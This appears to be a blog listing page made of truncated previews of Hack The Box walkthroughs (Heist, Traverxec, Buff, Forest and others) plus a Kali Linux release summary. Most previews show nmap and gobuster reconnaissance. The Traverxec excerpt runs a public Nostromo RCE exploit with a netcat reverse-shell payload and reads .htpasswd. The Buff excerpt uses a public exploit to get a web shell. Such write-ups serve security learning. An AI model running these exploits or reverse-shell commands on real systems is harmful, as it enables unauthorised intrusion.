HTB Heist

$ nmap -sC -sV -oA all -vv -p- 10.10.10.149
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php

Accessing http://10.10.10.149/login.php, there is a «Login as Guest» option.
On http://10.10.10.149/issues.php there is an «Attachment» link.
http://10.10.10.149/attachments/config.txt

The message talks about a Cisco Router. Hazard said to create a user account for him, so the username should be «hazard». Testing the admin credentials we've just found, we need an

Kali Linux 2021.1 Released

The new Kali 2021.1 version has been recently released. The official post can be found here: https://www.kali.org/blog/kali-linux-2021-1-release/

The summary of the news is:
Xfce 4.16 – Our preferred and current default desktop environment has been updated and tweaked
KDE 5.20 – Plasma also received a version bump
Terminals – mate-terminal, terminator and tilix all had various work carried out on them
Command Not Found – A helping hand to say if

HTB Traceback

$ nmap -A -T4 -p- 10.10.10.181

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29

Access http://10.10.10.181. Can we assume that there is a web shell in this box? Let's try to find out.

$ gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

With our usual wordlist there aren't interesting results. Let's try a different one, taking into account the comment on the main site that talked about web shells…

$ gobuster dir

HTB Traverxec

$ nmap -T4 -A -p- 10.10.10.165

Open ports:
22/tcp open ssh OpenSSH 7.9p1 Debian
80/tcp open http nostromo 1.9.6

Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html)

$ searchsploit nostromo

Our web server is vulnerable to an RCE… 🙂

$ searchsploit -m 47837
$ python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.15 1234"
$ nc -lnvp 1234
whoami
python3 -c "import pty;pty.spawn('/bin/bash')"

We are www-data, let's enumerate a little bit.

www-data@traverxec:/var/nostromo/conf$ ls -la
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd

$ chmod 600 david.key
$ ssh -i david.key david@10.10.10.165

HTB Bastion

$ nmap -A -p- -T4 10.10.10.134

Open ports:
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp

HTB Forest

$ forest nmap -T4 -A -p- 10.10.10.161

Open ports: we have an Active Directory LDAP server.
Domain Controller: htb.local
OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
Domain name: htb.local
Forest name: htb.local
FQDN: FOREST.htb.local

To start with the box enumeration we can use JXplorer. JXplorer is a cross-platform LDAP browser and editor. It is a standards-compliant, general purpose LDAP client that can be used

HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e

Access http://10.10.10.198:8080/. From this home page, access https://projectworlds.in. There is a list of different projects; here you will find this one: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/ From this site you can download the whole project.

$ searchsploit Gym Management System 1.0

Using this exploit (https://www.exploit-db.com/exploits/48506):

$ python2.7 48506.py http://10.10.10.198:8080/
C:\xampp\htdocs\gym\upload> whoami
C:\xampp\htdocs\gym\upload> dir

A web shell

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e

If we access http://10.10.10.150/administrator/, we'll find a Joomla login form. Accessing http://10.10.10.150, based on the published post there are these users: Super User, Floris. Looking at the source code, there is a suspicious secret.txt file somewhere.

http://10.10.10.150/secret.txt

This string seems to be encoded. Searching for «linux decode string», Google gives us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)

$ gobuster dir -u http://10.10.10.160 -w

Access http://10.10.10.160
Access http://10.10.10.160:10000
Access https://10.10.10.160:1000

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138

Although nmap says port 80 is open, it also appears as tcpwrapped. What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,